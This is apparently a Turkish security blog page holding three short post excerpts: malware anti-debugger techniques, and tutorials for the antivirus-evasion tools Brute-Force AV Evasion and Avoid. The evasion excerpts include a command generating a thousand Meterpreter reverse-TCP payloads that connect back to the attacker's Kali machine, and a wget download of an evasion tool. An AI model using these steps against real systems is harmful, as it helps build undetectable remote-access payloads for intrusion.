30 Nisan 2014 Çarşamba

Malwarelerin Debugger Tespit Etme Teknikleri

Malware örnekleri genellikle Virtual Machine gibi izole bir ortamda analistler tarafından analiz edilir. Analiz adımlarından statik ve dinamik kod analizlerinde debugger uygulamaları kullanılmaktadır. Bir zararlı yazılım debuggerlara karşı kendini korumak için içerisinde anti-debugger modüllerini barındırmaktadır. Anti-debugger özelliğine sahip bir zararlı kodu debugger uygulamaları ile analiz etmeye başladığınızda normal zararlı kod döngüsü halinde işlenmesini engeller ve sanki zararlı bir kod değilmiş gibi davranmasını sağlar.

Malware geliştiricileri debugger'lar gibi otomatik analiz sistemleri varlığını tespit etmek için bazı teknikler kullanmaktadırlar.

Bazı debugger uygulamaları;
  • Immunity Debugger
  • Olly Debugger

26 Nisan 2014 Cumartesi

Brute-Force Antivirus Bypass

Antivirus atlatma tekniklerinden biri olan Brute-force AV Evasion toolunun nasıl kullanıldığı ile ilgili bilgiler bu dökümanda yer almaktadır. Öncelikli olarak Brute-force AV Evasion programını Kali Linux üzerine download ediyoruz.


GenPayloads.py  kodunu çalıştırıyoruz;

python GenPayloads.py windows/meterpreter/reverse_tcp Kali IP Adresi  4444 1000 yes

Avoid Antivirus Bypass

Antivirus atlatma tekniklerinden biri olan Avoid toolunun nasıl kullanıldığı ile ilgili bilgiler bu dökümanda
yer almaktadır. Öncelikli olarak Avoid programını Kali Linux üzerine download ediyoruz.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip